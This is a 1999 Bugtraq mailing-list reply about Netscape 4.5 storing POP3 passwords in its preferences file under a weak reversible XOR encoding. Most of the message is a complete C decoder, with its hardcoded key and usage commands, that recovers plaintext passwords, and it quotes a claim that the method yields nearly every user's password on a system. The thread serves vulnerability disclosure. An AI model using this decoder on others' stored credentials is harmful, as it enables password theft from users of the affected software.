Bugtraq mailing list archives
Re: Netscape 4.5 vulnerability
From: wojtekka () BYDNET COM PL (Wojtek Kaniewski)
Date: Thu, 8 Apr 1999 23:35:58 +0200
Alexey Pavlov wrote:
I found method how to get users passwords from Netscape 4.5 for FreeBSD ~user/.netscape/liprefs.js file. This file is used for storing user last session preferences .This file also contains encrypted password for pop3.
This method has been found months ago.
Not like a DES , this encryption can be decrypted. As a result of many experiments i wrote this program. It gives me almost all passwords in my system, because all people use Netscape. Here is src of this decryption programm: (snip)
Fascinating way to decrypt "xored" password :) Here's my little decoder, that I wrote in April 1998 for Netscape 4.0x. -----cut here----- /* (c) 1998 by wojtek kaniewski (wojtekka () dione ids pl) */ #include <stdio.h> char base64[] = \ "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char key[] = \ { 86, 201, 239, 74, 155, 190, 90, 66, 119, 2, 67, 24, 112, 48, 139, 76, 176, 42, 214, 79, 149, 141, 250, 247, 87, 123, 152, 9, 67, 93, 1, 10 }; void main(int argc, char **argv) { int d = 0, m = 7, b, i = 0, c; char *p = (argc > 1) ? argv[1] : ""; for (; *p && *p != '='; p++) { for (c = 0; c < 64 && *p != base64[c]; c++); for (b = 5; b > -1; b--, m--) { d |= ((c & (1 << b)) >> b) << m; if (!m) { printf("%c", d ^ key[i++]); d = 0; m = 8; }; } } printf("\n"); } -----cut here----- $ gcc decode.c -o decode $ ./decode <encrypted-password-here> And no, it _won't_ get encrypted password from preferences file for you. -- wojtekka () irc pl:: http://wojtekka.stone.pl/ :: ^wojtekka@irc
Current thread:
- Re: Netscape 4.5 vulnerability Jon Schlegel (Apr 08)
- <Possible follow-ups>
- Re: Netscape 4.5 vulnerability Wojtek Kaniewski (Apr 08)
- Re: Netscape 4.5 vulnerability Dima Volodin (Apr 09)
- Re: Netscape 4.5 vulnerability Juha Jäykkä (Apr 15)
- stored credentials was: Netscape 4.5 vulnerability Russell Fulton (Apr 18)
- Re: stored credentials was: Netscape 4.5 vulnerability Bernd Eckenfels (Apr 20)
- Bug in WinNT 4.0 SP4 Alvaro Gilabert (Apr 19)
- Re: Bug in WinNT 4.0 SP4 David LeBlanc (Apr 20)
- Security Bulletins Digest aleph1 () UNDERGROUND ORG (Apr 20)
- stored credentials was: Netscape 4.5 vulnerability Russell Fulton (Apr 18)